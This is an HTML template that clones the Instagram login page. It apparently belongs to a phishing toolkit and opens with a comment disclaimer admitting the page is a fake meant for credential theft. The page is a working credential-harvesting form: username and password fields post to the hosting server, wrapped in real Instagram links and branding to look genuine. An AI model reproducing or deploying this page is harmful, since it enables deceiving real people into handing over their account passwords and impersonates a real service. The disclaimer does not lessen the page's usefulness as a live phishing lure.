
<!--
                ~ DISCLAIMER ~
  This page constitutes a clone of the original site and
  in NO WAY is connected to the real one. If you see this
  message and you are not FULLY AWARE of what this
  page is, then someone is trying to STEAL YOUR CREDENTIALS.
  DO NOT PUT ANY PERSONAL INFORMATION ANYWHERE.

  IF YOU HAVEN'T PUT ANY PERSONAL INFORMATION DO NOT WORRY.
  CLOSE THIS PAGE AND REPORT THE PERSON THAT SENT YOU THE LINK.

  ~ THE ORIGINAL AUTHOR OF THIS APP HAS NOTHING TO DO WITH ANY MISUSE ~
-->

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
    <title>Instagram</title>
	<link rel="stylesheet" href="static/insta/insta.css">
</head>


<body>
    <div class="wrapper">
        <div class="header">
            <div class="top">
                <div class="logo">
                    <img src="static/insta/instagram.png" alt="instagram logo" style="width: 175px;">
                </div>
                    <form method="post">
                        <div class="form">
                                <div class="input_field">
                                    <input type="text" placeholder="Phone number, username, or email" class="input" type="submit" name="name">
                                </div>
                                <div class="input_field">
                                    <input type="password" placeholder="Password" class="input" name="password">
                                </div>
                                <button class="btn" style="height: 30px; width: 270px;" type="submit">Log in</button>
                        </div>
                    </form>
                <div class="or">
                    <div class="line"></div>
                    <p>OR</p>
                    <div class="line"></div>
                </div>
                <div class="dif">
                    <div class="fb">
                        <img src="static/insta/facebook.png" alt="facebook">
                        <p href="https://www.facebook.com/">Log in with Facebook</p>
                    </div>
                    <div class="forgot">
                        <a href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
                    </div>
                </div>
            </div>
            <div class="signup">
                <p>Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a></p>
            </div>
            <div class="apps">
                <p>Get the app.</p>
                <div class="icons">
                    <a href="https://apps.apple.com/us/app/facebook/id284882215"><img src="static/insta/appstore.png" alt="appstore"></a>
                    <a href="https://play.google.com/store/apps/details?id=com.facebook.katana&hl=en&gl=US"><img src="static/insta/googleplay.png" alt="googleplay"></a>
                </div>
            </div>
        </div>
        <div class="footer">
            <div class="links">
                <ul>
                    <li><a href="https://about.instagram.com/">About us</a></li>
                    <li><a href="https://about.instagram.com/about-us/careers">Jobs</a></li>
                    <li><a href="https://help.instagram.com/">Help</a></li>
                    <li><a href="https://developers.facebook.com/docs/instagram">Api</a></li>
                    <li><a href="https://privacycenter.instagram.com/policy/?entry_point=ig_help_center_data_policy_redirect">Privacy</a></li>
                    <li><a href="https://help.instagram.com/581066165581870">Terms</a></li>
                    <li><a href="https://www.instagram.com/explore/locations/">Locations</a></li>
                    <li><a href="https://www.instagram.com/web/lite/">Instagram Lite</a></li>
                    <li><a href="https://www.instagram.com/directory/hashtags/">Hashtags</a></li>
                    <li><a href="https://about.instagram.com/blog">Blog</a></li>
                </ul>
            </div>
            <div class="copyright">
                © 2022 INSTAGRAM
            </div>
        </div>
    </div>

</body>

</html>
